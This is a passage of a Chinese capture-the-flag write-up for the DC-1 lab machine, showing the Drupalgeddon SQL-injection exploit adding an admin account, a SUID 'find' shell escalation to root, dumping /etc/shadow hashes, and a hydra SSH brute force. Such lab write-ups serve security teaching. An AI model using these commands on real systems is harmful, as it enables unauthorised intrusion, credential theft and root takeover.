Drupal Module CKEditor 3.0 < 3.6.2 - Persistent EventHandler Cross-Site Scripting                      | php/webapps/18389.txt
Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Scripting                 | php/webapps/25493.txt
Drupal Module CODER 2.5 - Remote Command Execution (Metasploit)                                        | php/webapps/40149.rb
Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution                                          | php/remote/40144.php
Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripting                                | php/webapps/35397.txt
Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary File Upload                         | php/webapps/37453.php
Drupal Module Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam - Multiple Vulnerabi | php/webapps/35072.txt
Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit)                                      | php/remote/40130.rb
Drupal Module Sections - Cross-Site Scripting                                                          | php/webapps/10485.txt
Drupal Module Sections 5.x-1.2/6.x-1.2 - HTML Injection                                                | php/webapps/33410.txt
------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

注意到有这一行

Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)                                   | php/webapps/34992.py

好家伙，竟然可以增加admin用户。那就增加adminadd/adminadd吧。

┌──(root??kali)-[~]
└─# python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.56.102 -u adminadd -p adminadd______                          __     _______  ___                                                                                    ____ _____|   _  \ .----.--.--.-----.---.-|  |   |   _   ||                                                                                       _   | _   ||.  |   \|   _|  |  |  _  |  _  |  |   |___|   _|___                                                                                    |   |.|   ||.  |    |__| |_____|   __|___._|__|      /   |___(_                                                                                    _   `-|.  ||:  1    /          |__|                 |   |  |:                                                                                      1   | |:  ||::.. . /                                |   |  |::.                                                                                    . . | |::.|`------'                                 `---'  `---                                                                                    ----' `---'_______       __     ___       __            __   _                                                                                    _|   _   .-----|  |   |   .-----|__.-----.----|  |_|_                                                                                    _.-----.-----.|   1___|  _  |  |   |.  |     |  |  -__|  __|   _|                                                                                      |  _  |     ||____   |__   |__|   |.  |__|__|  |_____|____|____|_                                                                                    _|_____|__|__||:  1   |  |__|      |:  |    |___|                                                                                                     |::.. . |            |::.|                                                                                                              `-------'            `---'                                                                                                              Drup4l => 7.0 <= 7.3                                                                                    1 Sql-1nj3ct10nAdmin 4                                                                                    cc0unt cr3at0rDiscovered by:Stefan  Horst(CVE-2014-3704)Written by:Claudio Vivianihttp://www.homelab.itinfo@homelab.ithomelabit@protonmail.chhttps://www.facebook.com/homelabithttps://twitter.com/homelabithttps://plus.google.com/+HomelabIt1/https://www.youtube.com/channel/UCqqmSdMqf_exi                                                                                    cCe_DjlBww[!] VULNERABLE![!] Administrator user created![*] Login: adminadd
[*] Pass: adminadd
[*] Url: http://192.168.56.102/?q=node&destination=no                                                                                    de

步骤6 flag3发现
用这个用户和密码登陆网页，可以轻松发现flag3

步骤7 提升权限
分析flag3的内容。提示我们应该要查看shadow文件，在查看文件前要获得提权。

mysql> exit;
exit;
Bye
www-data@DC-1:/$ find / -perm -4000
find / -perm -4000
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs
find: `/proc/5069/task/5069/fd/6': No such file or directory
find: `/proc/5069/task/5069/fdinfo/6': No such file or directory
find: `/proc/5069/fd/6': No such file or directory
find: `/proc/5069/fdinfo/6': No such file or directory

可以使用find命令提权root

www-data@DC-1:/$ find ./ aaa -exec '/bin/sh' \;
find ./ aaa -exec '/bin/sh' \;
# cat /etc/shadow
cat /etc/shadow
root:$6$rhe3rFqk$NwHzwJ4H7abOFOM67.Avwl3j8c05rDVPqTIvWg8k3yWe99pivz/96.K7IqPlbBCmzpokVmn13ZhVyQGrQ4phd/:17955:0:99999:7:::
daemon:*:17946:0:99999:7:::
bin:*:17946:0:99999:7:::
sys:*:17946:0:99999:7:::
sync:*:17946:0:99999:7:::
games:*:17946:0:99999:7:::
man:*:17946:0:99999:7:::
lp:*:17946:0:99999:7:::
mail:*:17946:0:99999:7:::
news:*:17946:0:99999:7:::
uucp:*:17946:0:99999:7:::
proxy:*:17946:0:99999:7:::
www-data:*:17946:0:99999:7:::
backup:*:17946:0:99999:7:::
list:*:17946:0:99999:7:::
irc:*:17946:0:99999:7:::
gnats:*:17946:0:99999:7:::
nobody:*:17946:0:99999:7:::
libuuid:!:17946:0:99999:7:::
Debian-exim:!:17946:0:99999:7:::
statd:*:17946:0:99999:7:::
messagebus:*:17946:0:99999:7:::
sshd:*:17946:0:99999:7:::
mysql:!:17946:0:99999:7:::
flag4:$6$Nk47pS8q$vTXHYXBFqOoZERNGFThbnZfi5LN0ucGZe05VMtMuIFyqYzY/eVbPNMZ7lpfRVc0BYrQ0brAhJoEzoEWCKxVW80:17946:0:99999:7:::

步骤8 flag4发现
发现了flag4用户，很明显信息就在这用户的空间里，但是密码是强加密的无法直接破解。准备用爆破的方法获取密码。

┌──(root??kali)-[/zyy]
└─# hydra -l flag4 -P /zyy/passwdlist.lst ssh://192.168.56.102
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-12-18 03:21:26
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 5 tasks per 1 server, overall 5 tasks, 5 login tries (l:1/p:0), ~5 try per task
[DATA] attacking ssh://192.168.56.102:22/
[22][ssh] host: 192.168.56.102   login: flag4   password: orange
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-12-18 03:21:29

爆破得到了flag4的密码是orange。用该账号密码登陆，可以轻松找到flag4.txt。

┌──(root??kali)-[/zyy]
└─# ssh flag4@192.168.56.102
The authenticity of host '192.168.56.102 (192.168.56.102)' can't be established.
ECDSA key fingerprint is SHA256:89B+YqcNl4cSf/BZk26MQG1QeW4BvBlVENMbTRhVhsU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? y
Please type 'yes', 'no' or the fingerprint: yes
Warning: Permanently added '192.168.56.102' (ECDSA) to the list of known hosts.
flag4@192.168.56.102's password:
Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Dec 17 17:50:35 2020
flag4@DC-1:~$ cat flag4.txt
Can you use this same method to find or access the flag in root?Probably. But perhaps it's not that easy.  Or maybe it is?

步骤9 找到thefinalflag
根据提示，应该把获得root权限作为下一个目标，而且应该直接就能找到。而此时明显是普通用户，因此我们可以再用一遍find提权，转过头发现步骤7的窗口还开着，那就直接进去找thefinalflag吧。那就直接进去找吧。

# cd /root
cd /root
# cat thefinalflag.txt
cat thefinalflag.txt
Well done!!!!Hopefully you've enjoyed this and learned some new skills.You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7

至此，DC-1靶机的五个flag都找到了。